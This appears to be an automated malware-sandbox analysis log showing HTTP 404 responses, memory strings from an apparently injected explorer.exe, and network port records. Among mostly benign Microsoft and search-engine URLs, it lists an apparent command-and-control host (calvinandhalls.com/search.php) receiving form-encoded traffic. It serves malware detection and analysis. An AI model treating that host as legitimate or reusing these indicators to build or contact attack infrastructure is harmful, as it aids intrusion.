Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:40:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:40:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:40:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:41:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.1506409569.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000000.1504585767.0000000004405000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.1504054456.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1505677351.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1505690894.0000000007720000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.1506409569.0000000009237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSA4
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 00000002.00000000.1504995292.000000000702D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/WN/
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/earch.php
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2385078500.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3874970360.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3874368668.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3874757842.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.3873766554.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.php
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.php=
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2385078500.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3874970360.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3874368668.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3874757842.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.3873766554.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com:443/search.phpt
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://java.co
Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comer
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1508355661.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/EM0
Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com48
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
